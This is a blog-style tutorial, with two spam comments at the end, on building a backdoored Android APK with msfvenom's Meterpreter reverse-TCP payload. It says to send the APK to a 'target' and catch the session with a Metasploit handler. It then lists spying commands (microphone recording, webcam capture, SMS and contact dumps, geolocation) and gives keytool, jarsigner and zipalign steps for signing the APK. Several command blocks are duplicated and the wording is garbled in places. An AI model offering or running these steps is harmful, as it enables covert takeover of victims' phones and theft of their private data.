HOW ANDROID HACK
Requirements
Linux Operating System (In this tutorial we use Linux Times 2017.2)
Metasploit Framework
MSFVenom is a hacking tool that targets the Android operating system. This tool is a composite of MSFEncode & MSFPayload.
Ok now let's start opening a new terminal and enter the following command This command assigns our charge and create our custom executable.
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R > hack.apkIf you do not know what your LHOST is, you can look it up using ifconfig.
# ifconfig
You have now finished creating your malicious .apk file, it will be saved to your / home / folder. Find the new one you created .apk and send it to your target (hack.apk).Now we need to start the Metasploit framework and set up a multi-handler. This is a special payload, as it is usually a Multistage Meterpreter charge, where the minimum amount of code is sent as part of an exploit, and then more uploads after the code execution is complete.
Open a new terminal and use the following command to start the Metasploit framework after the console starts creating your multi / handler.
# msfconsole
# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
When Target clicks on a
malicious app from the Android Main Activity Menu, a session between
Metasploit and Android phones will be created. For
new session list you can use session command -i to connect to new
session using session command -i 1 replace 1 with session id you want to
contact.msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
You may want to try some of these useful Exploit commands:
– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name
-keyalg RSA -keysize 2048 -validity 10000
Jarsinger (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1
-keystore my-release-key.Keystore APPNAME.apk aliasname
jarsigner -verify -verbose -certs APPNAME.apk
Zipalign (Does not come pre-installed in Kali Linux)
Install Zipalign
apt-get install zipalign
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Or if you choose to sign your .apk files directly from your Android device, you can sign your .apk file with ZipSigner an Android app that flags the update.zip, APK, or JAR files using your private key or one of four that there is. -in the certificate (media, platform, shared, testkey). All outputs are automatically zip-aligned. ZipSigner is a combination of applications from jarsigner, signapk, keytool, and zipalign.
Download ZipSigner
android hacking apps 2017
Now this is in actual fact cooperative. It’s very openhanded of you to share this with us.
ReplyDeleteheadsets
Fascinating information I haven’t been experienced such information in quite a long time.
ReplyDeleteadtechps